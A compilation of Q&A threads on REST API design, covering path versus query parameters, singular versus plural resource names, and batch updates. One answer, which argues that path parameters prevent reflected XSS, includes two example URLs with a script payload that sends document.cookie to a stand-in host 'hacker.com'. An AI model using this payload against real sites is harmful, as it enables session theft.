Designing a REST api by URI vs query string - rest

Let's say I have three resources that are related like so:
Grandparent (collection) -> Parent (collection) -> and Child (collection)
The above depicts the relationship among these resources like so: Each grandparent can map to one or several parents. Each parent can map to one or several children. I want the ability to support searching against the child resource but with the filter criteria:
If my clients pass me an id reference to a grandparent, I want to only search against children who are direct descendants of that grandparent.
If my clients pass me an id reference to a parent, I want to only search against children who are direct descendants of my parent.
I have thought of something like so:
GET /myservice/api/v1/grandparents/{grandparentID}/parents/children?search={text}
and
GET /myservice/api/v1/parents/{parentID}/children?search={text}
for the above requirements, respectively.
But I could also do something like this:
GET /myservice/api/v1/children?search={text}&grandparentID={id}&parentID=${id}
In this design, I could allow my client to pass me one or the other in the query string: either grandparentID or parentID, but not both.
My questions are:
1) Which API design is more RESTful, and why? Semantically, they mean and behave the same way. The last resource in the URI is "children", effectively implying that the client is operating on the children resource.
2) What are the pros and cons to each in terms of understandability from a client's perspective, and maintainability from the designer's perspective.
3) What are query strings really used for, besides "filtering" on your resource? If you go with the first approach, the filter parameter is embedded in the URI itself as a path parameter instead of a query string parameter.
Thanks!

Something to note, is that since you use GET in your above examples,
dependant on the end user browser settings, proxy settings or other calling applications internal settings,
the response is likely to be cached somewhere on the message route, and the original request message may never actually reach your API layer where the most recent data is accessed.
so first, you may want to review your requirement of using the verb GET.
If you want your API to return the most recent data every time, then don't use GET, or if you still want to use GET, then require the caller to append a random number to the end of the url, to decrease the likely hood of caching.
or get the client to send the verb PURGE, after every GET.
this proxy caching behaviour that is present across the internet, in browsers, and server architectures is where REST fails for me, since caching of GET can be very useful but only sometimes.
stick to basic querystrings if you want to make it really simple for the end developer and caching of responses offers no problems for you,
or
just use POST and forget about this tiresome REST argument

Related

REST Best practise for filtering and knowing the result is singular: List or single?

Variety of REST practises suggest (i.e. 1, 2, 3) to use plurals in your endpoints and the result is always a list of objects, unless it's filtered by a specific value, such as /users/123 Query parameters are used to filter the list, but still result in a list, nevertheless. I want to know if my case should 'abandon' those best practices.
Let's use cars for my example below.
I've got a database full of cars and each one has a BuildNumber ("Id"), but also a model and build year which combination is unique. If I then query for /cars/ and search for a specific model and year, for example /cars?model=golf&year=2018 I know, according to my previous sentence, my retrieve will always contain a single object, never multiple. My result, however, will still be a list, containing just one object, nevertheless.
In such case, what will be the best practise as the above would mean the object have to be extracted from the list, even though a single object could've been returned instead.
Stick to best practises and export a list
Make a second endpoind /car/ and use the query parameters ?model=golf&year=2018, which are primarily used for filtering in a list, and have the result be a single object, as the singular endpoint states
The reason that I'm asking this is simply for the cleanness of the action: I'm 100% sure my GET request will result in single object, but still have to perform actions to extract it from the list. These steps should've been unnecessary. Aside of that, In my case I don't know the unique identifier, so cars/123 for retrieving a specific car isn't an option. I know, however, filters that will result in one object and one specific object altogether. The additional steps simply feel redundant.
1: https://learn.microsoft.com/en-us/azure/architecture/best-practices/api-design
2: https://blog.mwaysolutions.com/2014/06/05/10-best-practices-for-better-restful-api/
3: https://medium.com/hashmapinc/rest-good-practices-for-api-design-881439796dc9
As you've specifically asked for best practices in regards to REST:
REST doesn't care how you specify your URIs or that semantically meaningful tokens are used inside the URI at all. Further, a client should never expect a certain URI to return a certain type but instead rely on content-type negotiation to tell the server all of the capabilities the client supports.
You should furthermore not think of REST in terms of object orientation but more in terms of affordance and statemachines where a client get served every information needed in order to make an educated decision on what to do next.
The best sample to give here is probably to take a close look at the Web and how it's done for HTML pages. How can you filter for a specific car and how it will be presented to you? The same concepts that are used in the Web also apply to REST as both use the same interaction model. In regards to your car sample, the API should initially return some control-structures that teach a client how a request needs to be formed and what options could be filtered for. In HTML this is done via forms. For non-HTML based REST APIs dedicated media-types should be defined that translate the same approach to non-HTML structures. On sending the request to the server, your client would include all of the supported media-types it supports in an Accept HTTP header, which informs the server about the capabilities of the client. Media-types are just human-readable specification on how to process payloads of such types. Such specifications may include hints on type information a link relation might return. In order to gain wide-usage of media-types they should be defined as generic as possible. Instead of defining a media-type specific for a car, which is possible, it probably would be more convenient to use an existing or define a new general data-container format (similar to HTML).
All of the steps mentioned here should help you to design and implement an API that is free to evolve without having to risk to break clients, that furthermore is also scalable and minimizes interoperability concerns.
Unfortunately your question targets something totally different IMO, something more related to RPC. You basically invoke a generic method via HTTP on an endpoint, similar like SOAP, RMI or CORBA work. Whether you respect the semantics of HTTP operations or not is only of sub-interest here. Even if you'd reached level 3 of the Richardson Maturity Model (RMM) it does not mean that you are compliant to REST. Your client might still break if the server changes anything within the response. The RMM further doesn't even consider media-types at all, hence I consider it as rather useless.
However, regardless if you use a (true) REST or RPC/CRUD client, if retrieving single items is your preference instead of feeding them into a collection you should consider to include the URI of the items of interest instead of its data directly into the collection, as Evert also has suggested. While most people seem to be concerned on server performance and round-trip-times, it actually is very elegant in terms of caching. Further certain link-relation names such as prefetch may inform the client that it may fetch the targets payload early as it is highly possible that it's content will be requested next. Through caching a request might not even have to be triggered or sent to the server for processing, which is probably the best performance gain you can achieve.
1) If you use query like cars/where... - use CARS
2) If you whant CAR - make method GetCarById
You might not get a perfect answer to this, because all are going to be a bit subjective and often in a different way.
My general thought about this is that every item in my system will have its own unique url, for example /cars/1234. That case is always singular.
But this specific item might appear as a member in collections and search results. When /cars/1234 apears in these, they will always appear as a list with 1 item (or 0 or more depending on the query).
I feel that this is ultimately the most predictable.
In my case though, if a car appears as a member of a search or colletion, it's 'true url' will still be displayed.

REST URL Design for One to Many and Many to Many Relationships

Your backend has two Models:
One Company to Many Employees.
You want to accomplish the following:
Get all Companies
Get a Company by ID
Get all Employees for a Company
Get all Employees
Get a Employee by ID
What is the best practice for handling the REST URLs when your models have 1:M relationships? This is what I have thought of so far:
/companies/
/companies/<company_id>/
/companies/<company_id>/employees/
/employees/
/employees/id/<employee_id>/
Now let's pretend One Company has Many Models. What is the best name to use for "Adding an employee to a Company" ? I can think of several alternatives:
Using GET:
/companies/<company_id>/add-employee/<employee_id>/
/employees/<employee_id/add-company/<company_id>/
Using POST:
/companies/add-employee/
/employees/add-company/
The URIs look fine to me, except maybe the last one, that does not need an additional "id" in the path. Also, I prefer singular forms of words, but that is just me perhaps:
/company/
/company/<company_id>/
/company/<company_id>/employee/
/employee/
/employee/<employee_id>/
The URIs do not matter that much actually, and can be changed at any point later in time when done properly. That is, all the URIs are linked to, instead of hardcoded into the client.
As far as adding an employee, I would perhaps use the same URIs defined above, and the PUT method:
PUT /employee/123
With some representation of an employee. I would prefer the PUT because it is idempotent. This means, if the operation seems to fail (timeout, network error occurs, whatever) the operation can be repeated without checking whether the previous one "really" failed on the server or not. The PUT requires some additional work on the server side, and some additional work to properly link to (such as forms), but offers a more robust design.
As an alternative you can use
POST /employee
With the employee representation as body. This does not offer any guarantees, but it is easier to implement.
Do not use GET to add an employee (or anything for that matter). This would go against the HTTP Specification for the GET method, which states that it should be a pure information retrieval method.

Looking for RESTful approach to update multiple resources with the same field set

The task: I have multiple resources that need to be updated in one HTTP call.
The resource type, field and value to update are the same for all resources.
Example: have set of cars by their IDs, need to update "status" of all cars to "sold".
Classic RESTFul approach: use request URL something like
PUT /cars
with JSON body like
[{id:1,status:sold},{id:2,status:sold},...]
However this seems to be an overkill: too many times to put status:sold
Looking for a RESTful way (I mean the way that is as close to "standard" rest protocol as possible) to send status:sold just once for all cars along with the list of car IDs to update. This is what I would do:
PUT /cars
With JSON
{ids=[1,2,...],status:sold} but I am not sure if this is truly RESTful approach.
Any ideas?
Also as an added benefit: I would like to be able to avoid JSON for small number of cars by simply setting up a URL with parameters something like this:
PUT /cars?ids=1,2,3&status=sold
Is this RESTful enough?
An even simpler way would just be:
{sold:[1,2,...]}
There's no need to have multiple methods for larger or smaller numbers of requests - it wastes development time and has no noteable impact upon performance or bandwidth.
As far as it being RESTful goes, as long as it's easily decipherable by the recipient and contains all the information you need, then there's no problem with it.
As I understand it using put is not sufficient to write a single property of a resource. One idea is to simply expose the property as a resource itself:
Therefore: PUT /car/carId/status with body content 'Sold'.
Updating more than one car should result in multiple puts since a request should only target a single resource.
Another Idea is to expose a certain protocol where you build a 'batch' resource.
POST /daily-deals-report/ body content {"sold" : [1, 2, 3, 4, 5]}
Then the system can simply acknowledge the deals being made and update the cars status itself. This way you create a whole new point of view and enable a more REST like api then you actually intended.
Also you should think about exposing a resource listing all cars that are available and therefore are ready for being sold (therefore not sold, and not needing repairs or are not rent).
GET /cars/pricelist?city=* -> List of all cars ready to be sold including car id and price.
This way a car do not have a status regarding who is owning the car. A resource is usually independent of its owner (owner is aggregating cars not a composite of it).
Whenever you have difficulties to map an operation to a resource your model tend to be flawed by object oriented thinking. With resources many relations (parent property) and status properties tend to be misplaced since designing resources is even more abstract than thinking in services.
If you need to manipulate many similar objects you need to identify the business process that triggers those changes and expose this process by a single resource describing its input (just like the daily deals report).

Querystring in REST Resource url

I had a discussion with a colleague today around using query strings in REST URLs. Take these 2 examples:
1. http://localhost/findbyproductcode/4xxheua
2. http://localhost/findbyproductcode?productcode=4xxheua
My stance was the URLs should be designed as in example 1. This is cleaner and what I think is correct within REST. In my eyes you would be completely correct to return a 404 error from example 1 if the product code did not exist whereas with example 2 returning a 404 would be wrong as the page should exist. His stance was it didn't really matter and that they both do the same thing.
As neither of us were able to find concrete evidence (admittedly my search was not extensive) I would like to know other people's opinions on this.
There is no difference between the two URIs from the perspective of the client. URIs are opaque to the client. Use whichever maps more cleanly into your server side infrastructure.
As far as REST is concerned there is absolutely no difference. I believe the reason why so many people do believe that it is only the path component that identifies the resource is because of the following line in RFC 2396
The query component is a string of
information to be interpreted by the
resource.
This line was later changed in RFC 3986 to be:
The query component contains
non-hierarchical data that, along with
data in the path component (Section
3.3), serves to identify a resource
IMHO this means both query string and path segment are functionally equivalent when it comes to identifying a resource.
Update to address Steve's comment.
Forgive me if I object to the adjective "cleaner". It is just way too subjective. You do have a point though that I missed a significant part of the question.
I think the answer to whether to return 404 depends on what the resource is that is being retrieved. Is it a representation of a search result, or is it a representation of a product? To know this you really need to look at the link relation that led us to the URL.
If the URL is supposed to return a Product representation then a 404 should be returned if the code does not exist. If the URL returns a search result then it shouldn't return a 404.
The end result is that what the URL looks like is not the determining factor. Having said that, it is convention that query strings are used to return search results so it is more intuitive to use that style of URL when you don't want to return 404s.
In typical REST API's, example #1 is more correct. Resources are represented as URI and #1 does that more. Returning a 404 when the product code is not found is absolutely the correct behavior. Having said that, I would modify #1 slightly to be a little more expressive like this:
http://localhost/products/code/4xheaua
Look at other well-designed REST APIs - for example, look at StackOverflow. You have:
stackoverflow.com/questions
stackoverflow.com/questions/tagged/rest
stackoverflow.com/questions/3821663
These are all different ways of getting at "questions".
There are two use cases for GET
Get a uniquely identified resource
Search for resource(s) based on given criteria
Use Case 1 Example:
/products/4xxheua
Get a uniquely identified product, returns 404 if not found.
Use Case 2 Example:
/products?size=large&color=red
Search for a product, returns list of matching products (0 to many).
If we look at say the Google Maps API we can see they use a query string for search.
e.g.
http://maps.googleapis.com/maps/api/geocode/json?address=los+angeles,+ca&sensor=false
So both styles are valid for their own use cases.
IMO the path component should always state what you want to retrieve. An URL like http://localhost/findbyproductcode does only say I want to retrieve something by product code, but what exactly?
So you retrieve contacts with http://localhost/contacts and users with http://localhost/users. The query string is only used for retrieving a subset of such a list based on resource attributes. The only exception to this is when this subset is reduced to one record based on the primary key, then you use something like http://localhost/contact/[primary_key].
That's my approach, your mileage may vary :)
The way I think of it, URI path defines the resource, while optional querystrings supply user-defined information. So
https://domain.com/products/42
identifies a particular product while
https://domain.com/products?price=under+5
might search for products under $5.
I disagree with those who said using querystrings to identify a resource is consistent with REST. Big part of REST is creating an API that imitates a static hierarchical file system (without literally needing such a system on the backend)--this makes for intuitive, semantic resource identifiers. Querystrings break this hierarchy. For example watches are an accessory that have accessories. In the REST style it's pretty clear what
https://domain.com/accessories/watches
and
https://domain.com/watches/accessories
each refer to. With querystrings,
https://domain.com?product=watches&category=accessories
is not not very clear.
At the very least, the REST style is better than querystrings because it requires roughly half as much information since strong-ordering of parameters allows us to ditch the parameter names.
The ending of those two URIs is not very significant RESTfully.
However, the 'findbyproductcode' portion could certainly be more restful. Why not just
http://localhost/product/4xxheau ?
In my limited experience, if you have a unique identifier then it would look clean to construct the URI like .../product/{id}
However, if product code is not unique, then I might design it more like #2.
However, as Darrel has observed, the client should not care what the URI looks like.
This question is deticated to, what is the cleaner approach. But I want to focus on a different aspect, called security. As I started working intensively on application security I found out that a reflected XSS attack can be successfully prevented by using PathParams (appraoch 1) instead of QueryParams (approach 2).
(Of course, the prerequisite of a reflected XSS attack is that the malicious user input gets reflected back within the html source to the client. Unfortunately some application will do that, and this is why PathParams may prevent XSS attacks)
The reason why this works is that the XSS payload in combination with PathParams will result in an unknown, undefined URL path due to the slashes within the payload itself.
http://victim.com/findbyproductcode/<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>**
Whereas this attack will be successful by using a QueryParam!
http://localhost/findbyproductcode?productcode=<script>location.href='http://hacker.com?sessionToken='+document.cookie;</script>
The query string is unavoidable in many practical senses.... Consider what would happen if the search allowed multiple (optional) fields to all ve specified. In the first form, their positions in the hierarchy would have to be fixed and padded...
Imagine coding a general SQL "where clause" in that format....However as a query string, it is quite simple.
By the REST client the URI structure does not matter, because it follows links annotated with semantics, and never parses the URI.
By the developer who writes the routing logic and the link generation logic, and probably want to understand log by checking the URLs the URI structure does matter. By REST we map URIs to resources and not to operations - Fielding dissertation / uniform interface / identification of resources.
So both URI structures are probably flawed, because they contain verbs in their current format.
1. /findbyproductcode/4xxheua
2. /findbyproductcode?productcode=4xxheua
You can remove find from the URIs this way:
1. /products/code:4xxheua
2. /products?code="4xxheua"
From a REST perspective it does not matter which one you choose.
You can define your own naming convention, for example: "by reducing the collection to a single resource using an unique identifier, the unique identifier must be always part of the path and not the query". This is just the same what the URI standard states: the path is hierarchical, the query is non-hierarchical. So I would use /products/code:4xxheua.
Philosophically speaking, pages do not "exist". When you put books or papers on your bookshelf, they stay there. They have some separate existence on that shelf. However, a page exists only so long as it is hosted on some computer that is turned on and able to provide it on demand. The page can, of course, be always generated on the fly, so it doesn't need to have any special existence prior to your request.
Now think about it from the point of view of the server. Let's assume it is, say, properly configured Apache --- not a one-line python server just mapping all requests to the file system. Then the particular path specified in the URL may have nothing to do with the location of a particular file in the filesystem. So, once again, a page does not "exist" in any clear sense. Perhaps you request http://some.url/products/intel.html, and you get a page; then you request http://some.url/products/bigmac.html, and you see nothing. It doesn't mean that there is one file but not the other. You may not have permissions to access the other file, so the server returns 404, or perhaps bigmac.html was to be served from a remote Mc'Donalds server, which is temporarily down.
What I am trying to explain is, 404 is just a number. There is nothing special about it: it could have been 40404 or -2349.23847, we've just agreed to use 404. It means that the server is there, it communicates with you, it probably understood what you wanted, and it has nothing to give back to you. If you think it is appropriate to return 404 for http://some.url/products/bigmac.html when the server decides not to serve the file for whatever reason, then you might as well agree to return 404 for http://some.url/products?id=bigmac.
Now, if you want to be helpful for users with a browser who are trying to manually edit the URL, you might redirect them to a page with the list of all products and some search capabilities instead of just giving them a 404 --- or you can give a 404 as a code and a link to all products. But then, you can do the same thing with http://some.url/products/bigmac.html: automatically redirect to a page with all products.

RESTful POSTS, do you POST objects to the singular or plural Uri?

Which one of these URIs would be more 'fit' for receiving POSTs (adding product(s))? Are there any best practices available or is it just personal preference?
/product/ (singular)
or
/products/ (plural)
Currently we use /products/?query=blah for searching and /product/{productId}/ for GETs PUTs & DELETEs of a single product.
Since POST is an "append" operation, it might be more Englishy to POST to /products, as you'd be appending a new product to the existing list of products.
As long as you've standardized on something within your API, I think that's good enough.
Since REST APIs should be hypertext-driven, the URI is relatively inconsequential anyway. Clients should be pulling URIs from returned documents and using those in subsequent requests; typically applications and people aren't going to need to guess or visually interpret URIs, since the application will be explicitly instructing clients what resources and URIs are available.
Typically you use POST to create a resource when you don't know the identifier of the resource in advance, and PUT when you do. So you'd POST to /products, or PUT to /products/{new-id}.
With both of these you'll return 201 Created, and with the POST additionally return a Location header containing the URL of the newly created resource (assuming it was successfully created).
In RESTful design, there are a few patterns around creating new resources. The pattern that you choose largely depends on who is responsible for choosing the URL for the newly created resource.
If the client is responsible for choosing the URL, then the client should PUT to the URL for the resource. In contrast, if the server is responsible for the URL for the resource then the client should POST to a "factory" resource. Typically the factory resource is the parent resource of the resource being created and is usually a collection which is pluralized.
So, in your case I would recommend using /products
You POST or GET a single thing: a single PRODUCT.
Sometimes you GET with no specific product (or with query criteria). But you still say it in the singular.
You rarely work plural forms of names. If you have a collection (a Catalog of products), it's one Catalog.
I would only post to the singular /product. It's just too easy to mix up the two URL-s and get confused or make mistakes.
As many said, you can probably choose any style you like as long as you are consistent, however I'd like to point out some arguments on both sides; I'm personally biased towards singular
In favor of plural resource names:
simplicity of the URL scheme as you know the resource name is always at plural
many consider this convention similar to how databases tables are addressed and consider this an advantage
seems to be more widely adopted
In favor of singular resource names (this doesn't exclude plurals when working on multiple resources)
the URL scheme is more complex but you gain more expressivity
you always know when you are dealing with one or more resources based on the resource name, as opposed to check whether the resource has an additional Id path component
plural is sometimes harder for non-native speakers (when is not simply an "s")
the URL is longer
the "s" seems to be a redundant from a programmers' standpoint
is just awkward to consider the path parameter as a sub-resource of the collection as opposed to consider it for what it is: simply an ID of the resource it identifies
you can apply the filtering parameters only where they are needed (endpoint with plural resource name)
you could use the same url for all of them and use the MessageContext to determine what type of action the caller of the web service wanted to perform.
No language was specified but in Java you can do something like this.
WebServiceContext ws_ctx;
MessageContext ctx = ws_ctx.getMessageContext();
String action = (String)ctx.get(MessageContext.HTTP_REQUEST_METHOD);
if(action.equals("GET")
// do something
else if(action.equals("POST")
// do something
That way you can check the type of request that was sent to the web service and perform the appropriate action based upon the request method.